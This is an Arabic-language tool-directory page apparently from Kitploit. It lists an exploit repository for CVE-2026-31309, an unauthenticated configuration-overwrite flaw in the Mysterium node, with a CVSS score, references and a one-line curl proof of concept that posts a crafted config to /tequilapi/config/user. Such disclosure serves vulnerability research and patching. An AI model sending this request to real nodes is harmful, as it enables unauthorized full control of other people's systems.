Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-31309 — التحكم غير السليم في الوصول في عقدة Mysterium قبل الإصدار v1.36.0 | Kitploit
أدوات/GitHubGitHub/sch8ill/cve-2026-31309
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubsch8ill/cve-2026-31309

CVE-2026-31309

التحكم غير السليم في الوصول في عقدة Mysterium قبل الإصدار v1.36.0

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

CVE-2026-31309: التحكم في الوصول غير الصحيح في عقدة Mysterium قبل الإصدار 1.36.0

يسمح التفويض غير الصحيح في نقطة النهاية /tequilapi/config/user لعقدة Mysterium من الإصدار v1.21.1-rc0 قبل الإصدار v1.36.0 لمهاجم غير مصادق بتجاوز تكوين العقدة بشكل عشوائي وتحقيق سيطرة كاملة عليها عبر طلب POST مصمم خصيصًا.

CVSS

الدرجة: 9.8 (حرجة)

المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

PoC

root@kitploit:~
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://<host>:<port>/tequilapi/config/user

اكتشفه Till Schacht.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2026-31309
  • https://www.cve.org/CVERecord?id=CVE-2026-31309
  • https://github.com/advisories/GHSA-p7gf-g6r8-g65h
تنزيل الأداة